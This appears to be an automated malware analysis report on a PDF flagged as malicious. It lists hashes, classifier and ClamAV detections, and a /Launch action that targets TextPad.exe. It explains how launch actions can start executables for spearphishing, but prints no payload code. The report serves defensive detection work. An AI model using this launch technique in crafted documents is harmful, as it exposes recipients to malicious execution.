Malicious PDF — malware analysis report

Static analysis result for SHA-256 670f5630f59a6920…

MALICIOUS

PDF

3.4 KB Created: 2008-03-12 20:26:23 +01:00 Authoring application: PDFlib Personalization Server 7.0.2p8 (Linux-x86_64)
MD5: d2cb56832c12b13c88c2c080cbb77b65 SHA-1: 5f40dc9cac00bd8b949d0d8431feaebd0ac60294 SHA-256: 670f5630f59a6920dae7b95a0c866b9972ece2a0f95c7a9a5748ddf17eca47fc
192 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1566.001 Spearphishing Attachment

The PDF contains a launch action that attempts to execute 'TextPad.exe' with the argument 'status.txt' from the path 'C:/Programme/TextPad'. This is a common technique to trick users into running malicious payloads disguised as legitimate files or processes. The ML classifier and ClamAV detection further support the malicious nature of this PDF.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9885

Heuristics 4

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • /Launch action target: TextPad.exe high PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters 'status.txt'.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/
    • http://www.aiim.org/pdfa/ns/id/
    • http://ns.adobe.com/pdf/1.3/

Open this report in the interactive analyzer, or submit your own file for analysis.